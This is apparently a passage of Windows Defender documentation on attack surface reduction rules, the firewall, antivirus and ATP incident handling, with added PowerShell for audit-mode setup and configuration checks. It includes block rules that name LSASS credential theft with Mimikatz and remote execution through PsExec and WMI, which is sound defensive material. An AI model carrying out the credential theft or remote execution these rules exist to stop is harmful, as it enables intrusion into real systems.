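    Group-Object Feature | Sort-Object Count -Descending |
    Select-Object Count, Name
```

Pipe Get-ExploitGuardEvents to Export-Csv per machine and merge the files centrally if you are on an E3 license without the Windows Defender ATP reporting the page describes; the 5007 events are worth keeping in the export because they show when someone changed the mode.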

Attack surface reduction rules


The following sections describe each of the attack surface reduction rules. This table shows their corresponding GUIDs, which you use if you're configuring the rules with Group Policy or PowerShell. If you use System Center Configuration Manager or Microsoft Intune, you do not need the GUIDs. The table also shows whether file and folder exclusions apply to each rule:

Block executable content from email client and webmail
    GUID: BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550
    File & folder exclusions: Supported

Block all Office applications from creating child processes
    GUID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
    File & folder exclusions: Supported

Block Office applications from creating executable content
    GUID: 3B576869-A4EC-4529-8536-B80A7769E899
    File & folder exclusions: Supported

Block Office applications from injecting code into other processes
    GUID: 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84
    File & folder exclusions: Supported

Block JavaScript or VBScript from launching downloaded executable content
    GUID: D3E037E1-3EB8-44C8-A917-57927947596D
    File & folder exclusions: Not supported

Block execution of potentially obfuscated scripts
    GUID: 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC
    File & folder exclusions: Supported

Block Win32 API calls from Office macro
    GUID: 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B
    File & folder exclusions: Supported

Block executable files from running unless they meet a prevalence, age, or trusted list criterion
    GUID: 01443614-cd74-433a-b99e-2ecdc07bfc25
    File & folder exclusions: Supported

Use advanced protection against ransomware
    GUID: c1db55ab-c21a-4637-bb3f-a12568109d35
    File & folder exclusions: Supported

Block credential stealing from the Windows local security authority subsystem (lsass.exe)
    GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2
    File & folder exclusions: Supported

Block process creations originating from PSExec and WMI commands
    GUID: d1e49aac-8f56-4280-b9ba-993a6d77406c
    File & folder exclusions: Not supported

Block untrusted and unsigned processes that run from USB
    GUID: b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4
    File & folder exclusions: Supported

Block Office communication application from creating child processes
    GUID: 26190899-1602-49e8-8b27-eb1d0a1ce869
    File & folder exclusions: Supported

Block Adobe Reader from creating child processes
    GUID: 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c
    File & folder exclusions: Supported

Each rule description indicates which apps or file types the rule applies to. In general, the rules for Office apps apply to only Word, Excel, PowerPoint, and OneNote, or they apply to Outlook. Except where specified, attack surface reduction rules don't apply to any other Office apps.
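The GUIDs in the table are what PowerShell management needs, and the page's advice is to run every rule in audit mode first and add exclusions for line-of-business applications. The following PowerShell is an added example, not code from the original page, that does exactly that: it carries the table as a lookup, enables the rules in audit mode, skips the PsExec/WMI rule when the device is managed by System Center Configuration Manager (per the warning later on this page), adds a global exclusion, and reads the per-rule state back. It assumes the Defender PowerShell module on Windows 10, version 1709 or later, run elevated; the exclusion path is a placeholder.

```powershell
# Added example (not from the page): put all ASR rules into audit mode using the
# GUIDs from the table above. Assumes the Defender module, elevated prompt.

$AsrRules = [ordered]@{
    'BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550' = 'Block executable content from email client and webmail'
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Block all Office applications from creating child processes'
    '3B576869-A4EC-4529-8536-B80A7769E899' = 'Block Office applications from creating executable content'
    '75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84' = 'Block Office applications from injecting code into other processes'
    'D3E037E1-3EB8-44C8-A917-57927947596D' = 'Block JavaScript or VBScript from launching downloaded executable content'
    '5BEB7EFE-FD9A-4556-801D-275E5FFC04CC' = 'Block execution of potentially obfuscated scripts'
    '92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B' = 'Block Win32 API calls from Office macro'
    '01443614-cd74-433a-b99e-2ecdc07bfc25' = 'Block executables unless they meet a prevalence, age, or trusted list criterion'
    'c1db55ab-c21a-4637-bb3f-a12568109d35' = 'Use advanced protection against ransomware'
    '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2' = 'Block credential stealing from LSASS'
    'd1e49aac-8f56-4280-b9ba-993a6d77406c' = 'Block process creations originating from PSExec and WMI commands'
    'b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4' = 'Block untrusted and unsigned processes that run from USB'
    '26190899-1602-49e8-8b27-eb1d0a1ce869' = 'Block Office communication application from creating child processes'
    '7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c' = 'Block Adobe Reader from creating child processes'
}
$PsExecWmiRule = 'd1e49aac-8f56-4280-b9ba-993a6d77406c'

function Get-AsrRuleState {
    $p = Get-MpPreference
    # Actions: 0 = Disabled, 1 = Block, 2 = Audit; Ids and Actions are parallel arrays.
    for ($i = 0; $i -lt $p.AttackSurfaceReductionRules_Ids.Count; $i++) {
        $id = $p.AttackSurfaceReductionRules_Ids[$i]
        [pscustomobject]@{
            Rule   = $AsrRules[$id]
            Id     = $id
            Action = $p.AttackSurfaceReductionRules_Actions[$i]
        }
    }
}

function Enable-AsrRulesAudit {
    param(
        # The page warns that the PsExec/WMI rule breaks the SCCM client; leave it out there.
        [switch]$ManagedBySccm,
        [string[]]$Exclusions = @('C:\Program Files\LOB\Installer.exe')   # placeholder path
    )
    $ids = @($AsrRules.Keys)
    if ($ManagedBySccm) { $ids = @($ids | Where-Object { $_ -ne $PsExecWmiRule }) }
    # One action per rule ID, same order. AuditMode logs event 1122 instead of blocking.
    $actions = @($ids | ForEach-Object { 'AuditMode' })
    # Add-MpPreference adds or updates rules without discarding ones set elsewhere.
    Add-MpPreference -AttackSurfaceReductionRules_Ids $ids -AttackSurfaceReductionRules_Actions $actions
    # Exclusions are global: they apply to every rule that supports them, never to one rule.
    Add-MpPreference -AttackSurfaceReductionOnlyExclusions $Exclusions
    Get-AsrRuleState
}

Enable-AsrRulesAudit -ManagedBySccm
```

Because exclusions are global, check the table before relying on one: the JavaScript/VBScript rule and the PsExec/WMI rule ignore file and folder exclusions entirely, so an audit hit from either of them cannot be tuned away by path and needs the rule itself left in audit or disabled.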
Block executable content from email client and webmail
This rule blocks the following file types from launching from email in Microsoft Outlook or Outlook.com and
other popular webmail providers:
Executable files (such as .exe, .dll, or .scr)
Script files (such as a PowerShell .ps1, VisualBasic .vbs, or JavaScript .js file)
Intune name: Execution of executable content (exe, dll, ps, js, vbs, etc.) dropped from email (webmail/mail client) (no exceptions)
SCCM name: Block executable content from email client and webmail
GUID: BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550
Block all Office applications from creating child processes
This rule blocks Office apps from creating child processes. This includes Word, Excel, PowerPoint, OneNote, and
Access.
This is a typical malware behavior, especially malware that abuses Office as a vector, using VBA macros and
exploit code to download and attempt to run additional payload. Some legitimate line-of-business applications
might also use behaviors like this, including spawning a command prompt or using PowerShell to configure
registry settings.
Intune name: Office apps launching child processes
SCCM name: Block Office application from creating child processes
GUID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Block Office applications from creating executable content
This rule prevents Office apps, including Word, Excel, and PowerPoint, from creating executable content.
This rule targets a typical behavior where malware uses Office as a vector to break out of Office and save
malicious components to disk, where they persist and survive a computer reboot. This rule prevents malicious
code from being written to disk.
Intune name: Office apps/macros creating executable content
SCCM name: Block Office applications from creating executable content
GUID: 3B576869-A4EC-4529-8536-B80A7769E899
Block Office applications from injecting code into other processes
Attackers might attempt to use Office apps to migrate malicious code into other processes through code
injection, so the code can masquerade as a clean process. This rule blocks code injection attempts from Office
apps into other processes. There are no known legitimate business purposes for using code injection.
This rule applies to Word, Excel, and PowerPoint.
Intune name: Office apps injecting code into other processes (no exceptions)
SCCM name: Block Office applications from injecting code into other processes
GUID: 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84
Block JavaScript or VBScript from launching downloaded executable content
Malware often uses JavaScript and VBScript scripts to launch other malicious apps.
Malware written in JavaScript or VBS often acts as a downloader to fetch and launch additional native payload from the Internet. This rule prevents scripts from launching downloaded content, helping to prevent malicious use of the scripts to spread malware and infect machines. This isn't a common line-of-business use, but line-of-business applications sometimes use scripts to download and launch installers.

IMPORTANT
File and folder exclusions don't apply to this attack surface reduction rule.

Intune name: js/vbs executing payload downloaded from Internet (no exceptions)
SCCM name: Block JavaScript or VBScript from launching downloaded executable content
GUID: D3E037E1-3EB8-44C8-A917-57927947596D
Block execution of potentially obfuscated scripts
Script obfuscation is a common technique that both malware authors and legitimate applications use to hide
intellectual property or decrease script loading times. This rule detects suspicious properties within an obfuscated
script.
Intune name: Obfuscated js/vbs/ps/macro code
SCCM name: Block execution of potentially obfuscated scripts.
GUID: 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC
Block Win32 API calls from Office macros
Office VBA provides the ability to use Win32 API calls, which malicious code can abuse. Most organizations don't
use this functionality, but might still rely on using other macro capabilities. This rule allows you to prevent using
Win32 APIs in VBA macros, which reduces the attack surface.
Intune name: Win32 imports from Office macro code
SCCM name: Block Win32 API calls from Office macros
GUID: 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B
Block executable files from running unless they meet a prevalence, age, or trusted list criterion
This rule blocks the following file types from launching unless they either meet prevalence or age criteria, or
they're in a trusted list or exclusion list:
Executable files (such as .exe, .dll, or .scr)

NOTE
You must enable cloud-delivered protection to use this rule.

IMPORTANT
The rule Block executable files from running unless they meet a prevalence, age, or trusted list criterion with GUID 01443614-cd74-433a-b99e-2ecdc07bfc25 is owned by Microsoft and is not specified by admins. It uses cloud-delivered protection to update its trusted list regularly.
You can exclude individual files or folders (using folder paths or fully qualified resource names), but an exclusion applies to all attack surface reduction rules that support exclusions; you can't scope an exclusion to a specific rule.

Intune name: Executables that don't meet a prevalence, age, or trusted list criteria.
SCCM name: Block executable files from running unless they meet a prevalence, age, or trusted list criteria
GUID: 01443614-cd74-433a-b99e-2ecdc07bfc25
Use advanced protection against ransomware
This rule provides an extra layer of protection against ransomware. It scans executable files entering the system
to determine whether they're trustworthy. If the files closely resemble ransomware, this rule blocks them from
running, unless they're in a trusted list or exclusion list.

NOTE
You must enable cloud-delivered protection to use this rule.

Intune name: Advanced ransomware protection
SCCM name: Use advanced protection against ransomware
GUID: c1db55ab-c21a-4637-bb3f-a12568109d35
Block credential stealing from the Windows local security authority subsystem (lsass.exe)
Local Security Authority Subsystem Service (LSASS) authenticates users who log in to a Windows computer.
Windows Defender Credential Guard in Windows 10 normally prevents attempts to extract credentials from
LSASS. However, some organizations can't enable Credential Guard on all of their computers because of
compatibility issues with custom smartcard drivers or other programs that load into the Local Security Authority
(LSA). In these cases, attackers can use tools like Mimikatz to scrape cleartext passwords and NTLM hashes from
LSASS. This rule helps mitigate that risk by locking down LSASS.

NOTE
In some apps, the code enumerates all running processes and attempts to open them with exhaustive permissions. This
rule denies the app's process open action and logs the details to the security event log. This rule can generate a lot of noise.
If you have an app that overly enumerates LSASS, you need to add it to the exclusion list. By itself, this event log entry
doesn't necessarily indicate a malicious threat.

Intune name: Flag credential stealing from the Windows local security authority subsystem
SCCM name: Block credential stealing from the Windows local security authority subsystem
GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2
Block process creations originating from PSExec and WMI commands
This rule blocks processes created through PsExec and WMI commands from running, to prevent remote code execution that can spread malware attacks.
IMPORTANT
File and folder exclusions do not apply to this attack surface reduction rule.

WARNING
Only use this rule if you're managing your devices with Intune or another MDM solution. This rule is incompatible with
management through System Center Configuration Manager because this rule blocks WMI commands the SCCM client
uses to function correctly.

Intune name: Process creation from PSExec and WMI commands
SCCM name: Not applicable
GUID: d1e49aac-8f56-4280-b9ba-993a6d77406c
Block untrusted and unsigned processes that run from USB
With this rule, admins can prevent unsigned or untrusted executable files from running from USB removable
drives, including SD cards. Blocked file types include:
Executable files (such as .exe, .dll, or .scr)
Script files (such as a PowerShell .ps, VisualBasic .vbs, or JavaScript .js file)
Intune name: Untrusted and unsigned processes that run from USB
SCCM name: Block untrusted and unsigned processes that run from USB
GUID: b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4
Block Office communication application from creating child processes
This rule prevents Outlook from creating child processes. It protects against social engineering attacks and
prevents exploit code from abusing a vulnerability in Outlook. To achieve this, the rule prevents the launch of
additional payload while still allowing legitimate Outlook functions. It also protects against Outlook rules and
forms exploits that attackers can use when a user's credentials are compromised.

NOTE
This rule applies to Outlook and Outlook.com only.

Intune name: Process creation from Office communication products (beta)
SCCM name: Not yet available
GUID: 26190899-1602-49e8-8b27-eb1d0a1ce869
Block Adobe Reader from creating child processes
Through social engineering or exploits, malware can download and launch additional payloads and break out of
Adobe Reader. This rule prevents attacks like this by blocking Adobe Reader from creating additional processes.
Intune name: Process creation from Adobe Reader (beta)
SCCM name: Not applicable
GUID: 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c

Related topics
Enable attack surface reduction rules
Evaluate attack surface reduction rules
Windows Defender Firewall with Advanced Security
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
This is an overview of the Windows Defender Firewall with Advanced Security (WFAS) and Internet Protocol security (IPsec) features.

Feature description
Windows Defender Firewall with Advanced Security is an important part of a layered security model. By providing
host-based, two-way network traffic filtering for a device, Windows Defender Firewall blocks unauthorized
network traffic flowing into or out of the local device. Windows Defender Firewall also works with Network
Awareness so that it can apply security settings appropriate to the types of networks to which the device is
connected. Windows Defender Firewall and Internet Protocol Security (IPsec) configuration settings are integrated into a single Microsoft Management Console (MMC) named Windows Defender Firewall, so Windows Defender Firewall is also an important part of your network's isolation strategy.

Practical applications
To help address your organizational network security challenges, Windows Defender Firewall offers the following
benefits:
Reduces the risk of network security threats. Windows Defender Firewall reduces the attack surface of a
device, providing an additional layer to the defense-in-depth model. Reducing the attack surface of a device
increases manageability and decreases the likelihood of a successful attack.
Safeguards sensitive data and intellectual property. With its integration with IPsec, Windows
Defender Firewall provides a simple way to enforce authenticated, end-to-end network communications. It
provides scalable, tiered access to trusted network resources, helping to enforce integrity of the data, and
optionally helping to protect the confidentiality of the data.
Extends the value of existing investments. Because Windows Defender Firewall is a host-based firewall
that is included with the operating system, there is no additional hardware or software required. Windows
Defender Firewall is also designed to complement existing non-Microsoft network security solutions
through a documented application programming interface (API).

In this section
Isolating Microsoft Store Apps on Your Network: You can customize your Windows Defender Firewall configuration to isolate the network access of Microsoft Store apps that run on devices.
Securing End-to-End IPsec Connections by Using IKEv2: You can use IKEv2 to help secure your end-to-end IPsec connections.
Windows Defender Firewall with Advanced Security Administration with Windows PowerShell: Learn more about using Windows PowerShell to manage the Windows Defender Firewall.
Windows Defender Firewall with Advanced Security Design Guide: Learn how to create a design for deploying Windows Defender Firewall with Advanced Security.
Windows Defender Firewall with Advanced Security Deployment Guide: Learn how to deploy Windows Defender Firewall with Advanced Security.
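The three properties the overview describes (two-way host filtering, network-awareness profiles, and IPsec integration) can all be expressed with the NetSecurity cmdlets the administration topic above refers to. The following PowerShell is an added example and not code from the original page: it sets a block-inbound default on every profile, exposes one application port only on the Domain profile and only to a management subnet, and adds an IPsec rule so that inbound connections to that port must be authenticated rather than merely coming from an allowed address. It assumes the NetSecurity module on Windows 10 or Windows Server 2016 and an elevated prompt; the port, subnet and rule names are placeholders.

```powershell
# Added example (not from the page): profile-aware firewall baseline plus an IPsec
# rule that requires authenticated inbound traffic. Assumes the NetSecurity module,
# elevated prompt; port, subnet and display names are placeholders.

function Get-FirewallProfileSummary {
    Get-NetFirewallProfile |
        Select-Object Name, Enabled, DefaultInboundAction, DefaultOutboundAction
}

function Set-LayeredFirewallBaseline {
    param(
        [string]$ManagementSubnet = '10.0.50.0/24',   # placeholder
        [int]$AppPort = 8443                          # placeholder
    )
    # Two-way filtering: unsolicited inbound is blocked on every profile; outbound
    # stays allowed by default so the change does not cut the host off from management.
    Set-NetFirewallProfile -Profile Domain, Private, Public -Enabled True `
        -DefaultInboundAction Block -DefaultOutboundAction Allow

    # Network awareness: the rule applies only while the device is on the Domain
    # profile, so the port is closed when the same laptop sits on a public network.
    New-NetFirewallRule -DisplayName 'LOB app inbound (domain only)' -Direction Inbound `
        -Protocol TCP -LocalPort $AppPort -RemoteAddress $ManagementSubnet `
        -Profile Domain -Action Allow | Out-Null

    # IPsec integration: a source address in the allowed subnet is not enough; the
    # peer must authenticate (default phase 1 auth, computer Kerberos on a domain).
    New-NetIPsecRule -DisplayName 'LOB app require auth' -Protocol TCP -LocalPort $AppPort `
        -InboundSecurity Require -OutboundSecurity Request | Out-Null

    Get-FirewallProfileSummary
}

Set-LayeredFirewallBaseline
```

Apply this on a test host first: with DefaultInboundAction set to Block, any inbound service without an explicit allow rule (including remote management) stops answering, which is the intended effect of the two-way filtering the overview describes.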
Windows Defender Antivirus in Windows 10 and
Windows Server 2016
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Windows Defender Antivirus is a built-in antimalware solution that provides next generation protection for
desktops, portable computers, and servers.
Windows Defender Antivirus includes:
Cloud-delivered protection for near-instant detection and blocking of new and emerging threats. Along
with machine learning and the Intelligent Security Graph, cloud-delivered protection is part of the next-
gen technologies that power Windows Defender Antivirus.
Always-on scanning, using advanced file and process behavior monitoring and other heuristics (also
known as "real-time protection")
Dedicated protection updates based on machine-learning, human and automated big-data analysis, and
in-depth threat resistance research
You can configure and manage Windows Defender Antivirus with:
System Center Configuration Manager (as System Center Endpoint Protection, or SCEP)
Microsoft Intune
PowerShell
Windows Management Instrumentation (WMI)
Group Policy
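WMI is listed above as a management channel, and it is the one that works from inventory agents and remote tooling that do not load the Defender PowerShell module. The following PowerShell is an added example, not part of the original page: it reads Windows Defender Antivirus state through the Defender WMI classes and reports whether the next-generation features named on this page (cloud-delivered protection, block at first sight, potentially unwanted application blocking) are actually active. The namespace and class names (root/Microsoft/Windows/Defender, MSFT_MpComputerStatus, MSFT_MpPreference) and the property value meanings are supplied here and are not stated on the page.

```powershell
# Added example (not from the page): audit next-gen protection settings over WMI.
# Assumes the Defender WMI provider (root/Microsoft/Windows/Defender) on Windows 10.

function Get-DefenderAvState {
    $ns   = 'root/Microsoft/Windows/Defender'
    $stat = Get-CimInstance -Namespace $ns -ClassName MSFT_MpComputerStatus
    $pref = Get-CimInstance -Namespace $ns -ClassName MSFT_MpPreference
    [pscustomobject]@{
        RealTimeProtection = [bool]$stat.RealTimeProtectionEnabled
        EngineVersion      = $stat.AMEngineVersion
        SignatureAgeDays   = $stat.AntivirusSignatureAge
        # MAPSReporting: 0 = off, 1 = basic, 2 = advanced (cloud-delivered protection)
        CloudDelivered     = ($pref.MAPSReporting -ne 0)
        # Block at first sight needs advanced MAPS, automatic sample submission
        # (SubmitSamplesConsent 1 = safe samples, 3 = all samples) and the feature not disabled.
        BlockAtFirstSight  = ($pref.MAPSReporting -eq 2) -and
                             ($pref.SubmitSamplesConsent -in 1, 3) -and
                             (-not $pref.DisableBlockAtFirstSeen)
        # PUAProtection: 0 = disabled, 1 = block, 2 = audit
        PuaProtection      = $pref.PUAProtection
    }
}

function Test-NextGenProtectionBaseline {
    $s = Get-DefenderAvState
    $gaps = @()
    if (-not $s.RealTimeProtection)  { $gaps += 'real-time protection off' }
    if (-not $s.CloudDelivered)      { $gaps += 'cloud-delivered protection off' }
    if (-not $s.BlockAtFirstSight)   { $gaps += 'block at first sight not active' }
    if ($s.PuaProtection -ne 1)      { $gaps += 'PUA blocking not enforced' }
    if ($s.SignatureAgeDays -gt 3)   { $gaps += "signatures $($s.SignatureAgeDays) days old" }
    [pscustomobject]@{
        Compliant = ($gaps.Count -eq 0)
        Gaps      = $gaps
        State     = $s
    }
}

Test-NextGenProtectionBaseline
```

Because the Defender CIM classes answer over WinRM, the same two functions run fleet-wide with Invoke-Command, which is a quicker way to find machines where the Testground checks above would fail than visiting each one.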

TIP
You can visit the Windows Defender Testground website at demo.wd.microsoft.com to confirm the following features
are working and see how they work:
Cloud-delivered protection
Fast learning (including Block at first sight)
Potentially unwanted application blocking

What's new in Windows 10, version 1803


The block at first sight feature can now block non-portable executable files (such as JS, VBS, or macros)
as well as executable files.
The Virus & threat protection area in the Windows Security app now includes a section for ransomware
protection. It includes controlled folder access settings and ransomware recovery settings.

What's new in Windows 10, version 1703


New features for Windows Defender Antivirus in Windows 10, version 1703 include:
Updates to how the block at first sight feature can be configured
The ability to specify the level of cloud-protection
Windows Defender Antivirus protection in the Windows Security app
We've expanded this documentation library to cover end-to-end deployment, management, and
configuration for Windows Defender Antivirus, and we've added some new guides that can help with
evaluating and deploying Windows Defender AV in certain scenarios:
Evaluation guide for Windows Defender Antivirus
Deployment guide for Windows Defender Antivirus in a virtual desktop infrastructure environment

Minimum system requirements


Windows Defender AV has the same hardware requirements as Windows 10. For more information, see:
Minimum hardware requirements
Hardware component guidelines
Functionality, configuration, and management are largely the same when using Windows Defender AV on Windows Server 2016; however, there are some differences.

Related topics
Windows Defender AV in the Windows Security app
Windows Defender AV on Windows Server 2016
Windows Defender AV compatibility
Evaluate Windows Defender AV protection
Deploy, manage updates, and report on Windows Defender AV
Configure Windows Defender AV features
Customize, initiate, and review the results of scans and remediation
Review event logs and error codes to troubleshoot issues
Reference topics for management and configuration tools
Overview of endpoint detection and response
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Windows Defender ATP endpoint detection and response capabilities provide advanced attack detections that are
near real-time and actionable. Security analysts can prioritize alerts effectively, gain visibility into the full scope of a
breach, and take response actions to remediate threats.
When a threat is detected, alerts are created in the system for an analyst to investigate. Alerts with the same attack
techniques or attributed to the same attacker are aggregated into an entity called an incident. Aggregating alerts in
this manner makes it easy for analysts to collectively investigate and respond to threats.
Inspired by the "assume breach" mindset, Windows Defender ATP continuously collects behavioral cyber
telemetry. This includes process information, network activities, deep optics into the kernel and memory manager,
user login activities, registry and file system changes, and others. The information is stored for six months,
enabling an analyst to travel back in time to the start of an attack. The analyst can then pivot in various views and
approach an investigation through multiple vectors.
The response capabilities give you the power to promptly remediate threats by acting on the affected entities.

In this section
Security operations dashboard: Explore a high level overview of detections, highlighting where response actions are needed.
Incidents queue: View and organize the incidents queue, and manage and investigate incidents.
Alerts queue: View and organize the machine alerts queue, and manage and investigate alerts.
Machines list: Investigate machines with generated alerts and search for specific events over time.
Take response actions: Learn about the available response actions and apply them to machines and files.
Windows Defender Security Center Security
operations dashboard
4/22/2019 • 4 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

The Security operations dashboard is where the endpoint detection and response capabilities are surfaced. It
provides a high level overview of where detections were seen and highlights where response actions are needed.
The dashboard displays a snapshot of:
Active alerts
Machines at risk
Sensor health
Service health
Daily machines reporting
Active automated investigations
Automated investigations statistics
Users at risk
Suspicious activities
You can explore and investigate alerts and machines to quickly determine if, where, and when suspicious activities
occurred in your network to help you understand the context they appeared in.
From the Security operations dashboard you will see aggregated events to facilitate the identification of
significant events or behaviors on a machine. You can also drill down into granular events and low-level indicators.
It also has clickable tiles that give visual cues on the overall health state of your organization. Each tile opens a
detailed view of the corresponding overview.

Active alerts
You can view the overall number of active alerts from the last 30 days in your network from the tile. Alerts are
grouped into New and In progress.
Each group is further sub-categorized into their corresponding alert severity levels. Click the number of alerts
inside each alert ring to see a sorted view of that category's queue (New or In progress).
For more information, see Alerts overview.
Each row includes an alert severity category and a short description of the alert. You can click an alert to see its detailed view. For more information, see Investigate Windows Defender Advanced Threat Protection alerts and Alerts overview.

Machines at risk
This tile shows you a list of machines with the highest number of active alerts. The total number of alerts for each
machine is shown in a circle next to the machine name, and then further categorized by severity levels at the far
end of the tile (hover over each severity bar to see its label).

Click the name of the machine to see details about that machine. For more information, see Investigate machines in the Windows Defender Advanced Threat Protection Machines list.
You can also click Machines list at the top of the tile to go directly to the Machines list, sorted by the number of active alerts.

Sensor health
The Sensor health tile provides information on the individual machine’s ability to provide sensor data to the
Windows Defender ATP service. It reports how many machines require attention and helps you identify
problematic machines.

There are two status indicators that provide information on the number of machines that are not reporting
properly to the service:
Misconfigured – These machines might partially be reporting sensor data to the Windows Defender ATP
service and might have configuration errors that need to be corrected.
Inactive - Machines that have stopped reporting to the Windows Defender ATP service for more than seven
days in the past month.
When you click any of the groups, you’ll be directed to machines list, filtered according to your choice. For more
information, see Check sensor state and Investigate machines.

Service health
The Service health tile informs you if the service is active or if there are issues.

For more information on the service health, see Check the Windows Defender ATP service health.

Daily machines reporting

The Daily machines reporting tile shows a bar graph that represents the number of machines reporting daily in
the last 30 days. Hover over individual bars on the graph to see the exact number of machines reporting on each
day.
Active automated investigations
You can view the overall number of automated investigations from the last 30 days in your network from the
Active automated investigations tile. Investigations are grouped into Pending action, Waiting for machine,
and Running.

Automated investigations statistics

This tile shows statistics related to automated investigations in the last 30 days. It shows the number of
investigations completed, the number of successfully remediated investigations, the average pending time it takes
for an investigation to be initiated, the average time it takes to remediate an alert, the number of alerts
investigated, and the number of hours of automation saved compared with a typical manual investigation.

You can click on Automated investigations, Remediated investigations, and Alerts investigated to navigate
to the Investigations page, filtered by the appropriate category. This lets you see a detailed breakdown of
investigations in context.

Users at risk
The tile shows you a list of user accounts with the most active alerts, and the number of high, medium, and low
severity alerts for each account.
Click the user account to see details about the user account. For more information, see Investigate a user account.

Suspicious activities
This tile shows audit events based on detections from various security components.

Want to experience Windows Defender ATP? Sign up for a free trial.

Related topics
Understand the Windows Defender Advanced Threat Protection portal
Portal overview
View the Secure Score dashboard and improve your secure score
View the Threat analytics dashboard and take recommended mitigation actions
Incidents in Windows Defender ATP
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
When a cybersecurity threat is emerging, or a potential attacker is deploying its tactics, techniques/tools, and
procedures (TTPs) on the network, Windows Defender ATP will quickly trigger alerts and launch matching
automatic investigations.
Windows Defender ATP applies correlation analytics and aggregates all related alerts and investigations into an
incident. Doing so helps narrate a broader story of an attack, thus providing you with the right visuals (upgraded
incident graph) and data representations to understand and deal with complex cross-entity threats to your
organization's network.

In this section
View and organize the Incidents queue: See the list of incidents and learn how to apply filters to limit
the list and get a more focused view.

Manage incidents: Learn how to manage incidents by assigning them, updating their
status, or setting their classification and other actions.

Investigate incidents: See associated alerts, manage the incident, and see alert
metadata and visualizations to help you investigate an
incident.
View and organize the Windows Defender Advanced Threat Protection Incidents queue
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
The Incidents queue shows a collection of incidents that were flagged from machines in your network. It helps
you sort through incidents to prioritize and make an informed cybersecurity response decision.
By default, the queue displays incidents seen in the last 30 days, with the most recent incident showing at the top
of the list, so you see the most recent incidents first.
There are several options you can choose from to customize the Incidents queue view.
On the top navigation you can:
Customize columns to add or remove columns
Modify the number of items to view per page
Select the items to show per page
Batch-select the incidents to assign
Navigate between pages
Apply filters

Sort and filter the incidents queue


You can apply the following filters to limit the list of incidents and get a more focused view.

INCIDENT SEVERITY: DESCRIPTION

High (Red): Threats often associated with advanced persistent threats (APT). These incidents indicate a high risk
due to the severity of damage they can inflict on machines.

Medium (Orange): Threats rarely observed in the organization, such as anomalous registry change, execution of
suspicious files, and observed behaviors typical of attack stages.

Low (Yellow): Threats associated with prevalent malware and hack-tools that do not necessarily indicate an
advanced threat targeting the organization.

Informational (Grey): Informational incidents are those that might not be considered harmful to the network but
might be good to keep track of.

Category
Incidents are categorized by the stage of the cybersecurity kill chain they are in. This view helps the threat
analyst determine priority, urgency, and the corresponding response strategy to deploy based on context.
Alerts
Indicates the number of alerts associated with or part of the incidents.
Machines
You can limit the view to show only the machines at risk that are associated with incidents.
Users
You can limit the view to show only the users of the machines at risk that are associated with incidents.
Assigned to
You can choose to show either unassigned incidents or those that are assigned to you.
Status
You can choose to limit the list of incidents shown based on their status, to see which ones are active or resolved.
Classification
Use this filter to choose between focusing on incidents flagged as true or false incidents.

Related topics
Incidents queue
Manage incidents
Investigate incidents
Manage Windows Defender ATP incidents
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Managing incidents is an important part of every cybersecurity operation. You can manage incidents by selecting
an incident from the Incidents queue or the Incidents management pane. You can assign incidents to yourself,
change the status, classify, rename, or comment on them to keep track of their progress.

Selecting an incident from the Incidents queue brings up the Incident management pane where you can open
the incident page for details.

Assign incidents
If an incident has not been assigned yet, you can select Assign to me to assign the incident to yourself. Doing so
assumes ownership of not just the incident, but also all the alerts associated with it.

Change the incident status

You can categorize incidents (as Active or Resolved) by changing their status as your investigation progresses.
This helps you organize and manage how your team can respond to incidents.
For example, your SOC analyst can review the urgent Active incidents for the day, and decide to assign them to
themselves for investigation.
Alternatively, your SOC analyst might set the incident as Resolved if the incident has been remediated.

Classify the incident


You can choose not to set a classification, or decide to specify whether an incident is true or false. Doing so helps
the team see patterns and learn from them.

Rename incident
By default, incidents are assigned with numbers. You can rename the incident if your organization uses a naming
convention for easier cybersecurity threat identification.

Add comments and view the history of an incident

You can add comments and view historical events about an incident to see previous changes made to it.
Whenever a change or comment is made to an incident, it is recorded in the Comments and history section.
Added comments instantly appear on the pane.

Related topics
Incidents queue
View and organize the Incidents queue
Investigate incidents
Investigate incidents in Windows Defender ATP
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Investigate incidents that affect your network, understand what they mean, and collate evidence to resolve them.

Analyze incident details


Click an incident to see the Incident pane. Select Open incident page to see the incident details and related
information (alerts, machines, investigations, evidence, graph).

Alerts
You can investigate the alerts and see how they were linked together in an incident. Alerts are grouped into
incidents based on the following reasons:
Automated investigation - The automated investigation triggered the linked alert while investigating the
original alert
File characteristics - The files associated with the alert have similar characteristics
Manual association - A user manually linked the alerts
Proximate time - The alerts were triggered on the same machine within a certain timeframe
